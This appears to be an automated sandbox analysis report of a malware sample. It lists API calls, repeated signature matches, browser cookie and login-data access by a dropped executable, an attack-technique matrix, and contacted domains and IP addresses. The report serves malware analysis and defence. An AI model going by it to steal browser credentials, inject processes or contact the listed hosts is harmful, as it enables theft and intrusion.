                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_00427756 cpuid 6_2_00427756
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 5_2_00408861 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,5_2_00408861
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,6_2_0042FE47
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,6_2_00419F90
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,6_2_00419F90

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 37.0.oldplayer.exe.cf0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.E3B7.exe.48b7990.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.2.oldplayer.exe.cf0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.E3B7.exe.481db50.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.E3B7.exe.48b7990.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000025.00000002.698247896.0000000000CF1000.00000020.00000001.01000000.00000018.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.689655040.0000000000CF1000.00000020.00000001.01000000.00000018.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.702958379.00000000047B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\oldplayer.exe, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe, type: DROPPED
                Source: Yara matchFile source: 00000004.00000002.631913891.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.692909496.0000000001CE1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.632649984.00000000039F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.692342997.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.569951973.00000000038E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.569855669.0000000001E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 38.0.build3.exe.ad0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.build3.exe.ad0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: C:\Users\user\AppData\Local\537f7094-d60c-4d6f-ab72-afcba0f739b8\build3.exe, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exe, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\build3[1].exe, type: DROPPED
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 00000020.00000003.760836250.0000000000A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000003.767905065.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000003.770864078.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000003.773272246.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000003.772080220.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000003.760942402.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000003.771119197.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000003.769586177.0000000000A50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000003.761713931.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 33.2.build2.exe.1e215a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.build2.exe.1e215a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000021.00000002.700947142.0000000001E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 13.2.46F.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 31.2.3971.exe.39215a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.6E6C.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.3971.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.9721.exe.38f15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.46F.exe.38a15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.2.9721.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.9721.exe.39815a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 25.2.46F.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.2.9721.exe.38f15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 36.2.AB42.exe.38a15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.9721.exe.39815a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.124D.exe.38c15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 26.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.124D.exe.38c15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.124D.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.2.9721.exe.39e15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.46F.exe.38a15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.F42F.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.9721.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 36.2.AB42.exe.38a15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.124D.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.46F.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 25.2.46F.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.9721.exe.39215a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.3971.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.F42F.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 31.2.3971.exe.39215a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.9721.exe.39215a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.F42F.exe.38a15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 26.2.9721.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.F42F.exe.38a15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.9721.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 22.2.6E6C.exe.39215a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.6E6C.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.46F.exe.38b15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.2.9721.exe.38f15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 22.2.6E6C.exe.39215a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.2.9721.exe.39e15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.9721.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.46F.exe.38b15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.9721.exe.38f15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000023.00000002.704356813.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.686813260.0000000003980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.660464369.0000000003920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.704302142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.640916155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.648394809.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.686383358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.661107586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.651980343.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.651586722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.671665065.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001F.00000002.703237929.0000000003920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000002.798083058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000002.705832212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.707784475.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000024.00000002.694197467.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.637838144.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.797952336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.656069794.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.659138526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.667734975.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\AppData\Local\Temp\aafg31.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Local\Temp\aafg31.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\aafg31.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\e5e3adb0db601d775ac97503f6b61728

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000004.00000002.631913891.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.692909496.0000000001CE1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.632649984.00000000039F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.692342997.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.569951973.00000000038E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.569855669.0000000001E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 00000020.00000003.760836250.0000000000A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000003.767905065.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000003.770864078.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000003.773272246.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000003.772080220.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000003.760942402.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000003.771119197.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000003.769586177.0000000000A50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000003.761713931.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 33.2.build2.exe.1e215a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.build2.exe.1e215a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000021.00000002.700947142.0000000001E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 13.2.46F.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 31.2.3971.exe.39215a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.6E6C.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.3971.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.9721.exe.38f15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.46F.exe.38a15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.2.9721.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.9721.exe.39815a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 25.2.46F.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.2.9721.exe.38f15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 36.2.AB42.exe.38a15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.9721.exe.39815a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.124D.exe.38c15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 26.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.124D.exe.38c15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.124D.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.2.9721.exe.39e15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.46F.exe.38a15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.F42F.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.9721.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 36.2.AB42.exe.38a15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.124D.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.46F.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 25.2.46F.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.9721.exe.39215a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.3971.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.F42F.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 31.2.3971.exe.39215a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.9721.exe.39215a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.F42F.exe.38a15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 26.2.9721.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.F42F.exe.38a15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.9721.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 22.2.6E6C.exe.39215a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.6E6C.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.46F.exe.38b15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.2.9721.exe.38f15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 22.2.6E6C.exe.39215a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.2.9721.exe.39e15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.9721.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.46F.exe.38b15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.9721.exe.38f15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000023.00000002.704356813.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.686813260.0000000003980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.660464369.0000000003920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.704302142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.640916155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.648394809.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.686383358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.661107586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.651980343.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.651586722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.671665065.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001F.00000002.703237929.0000000003920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000002.798083058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000002.705832212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.707784475.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000024.00000002.694197467.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.637838144.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.797952336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.656069794.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.659138526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.667734975.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts2
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                Exfiltration Over Other Network Medium14
                Ingress Tool Transfer
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization2
                Data Encrypted for Impact
                Default Accounts1
                Shared Modules
                1
                Registry Run Keys / Startup Folder
                1
                DLL Side-Loading
                1
                Deobfuscate/Decode Files or Information
                1
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                Exfiltration Over Bluetooth21
                Encrypted Channel
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts1
                Exploitation for Client Execution
                1
                Services File Permissions Weakness
                612
                Process Injection
                21
                Obfuscated Files or Information
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Input Capture
                Automated Exfiltration4
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local Accounts2
                Command and Scripting Interpreter
                Logon Script (Mac)1
                Registry Run Keys / Startup Folder
                2
                Software Packing
                NTDS36
                System Information Discovery
                Distributed Component Object ModelInput CaptureScheduled Transfer125
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon Script1
                Services File Permissions Weakness
                1
                DLL Side-Loading
                LSA Secrets451
                Security Software Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common1
                File Deletion
                Cached Domain Credentials131
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items11
                Masquerading
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job131
                Virtualization/Sandbox Evasion
                Proc Filesystem1
                Application Window Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)612
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                Hidden Files and Directories
                Network Sniffing1
                Remote System Discovery
                Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                Services File Permissions Weakness
                Input Capture1
                System Network Configuration Discovery
                Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 892263 Sample: file.exe Startdate: 21/06/2023 Architecture: WINDOWS Score: 100 109 api.2ip.ua 2->109 139 Snort IDS alert for network traffic 2->139 141 Multi AV Scanner detection for domain / URL 2->141 143 Found malware configuration 2->143 145 20 other signatures 2->145 12 file.exe 2->12         started        15 uwjrhss 2->15         started        17 9721.exe 2->17         started        signatures3 process4 signatures5 195 Detected unpacking (changes PE section rights) 12->195 197 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 12->197 199 Maps a DLL or memory area into another process 12->199 201 Creates a thread in another existing process (thread injection) 12->201 19 explorer.exe 10 41 12->19 injected 203 Multi AV Scanner detection for dropped file 15->203 205 Machine Learning detection for dropped file 15->205 207 Checks if the current machine is a virtual machine (disk enumeration) 15->207 209 Detected unpacking (overwrites its own PE header) 17->209 211 Injects a PE file into a foreign processes 17->211 24 9721.exe 17->24         started        process6 dnsIp7 111 astoriaresidency.com 103.233.24.19, 443, 49711 WEBWERKS-AS-INWebWerksIndiaPvtLtdIN India 19->111 113 201.124.31.170 UninetSAdeCVMX Mexico 19->113 117 10 other IPs or domains 19->117 75 C:\Users\user\AppData\Roaming\uwjrhss, PE32 19->75 dropped 77 C:\Users\user\AppData\Roaming\tgjrhss, PE32 19->77 dropped 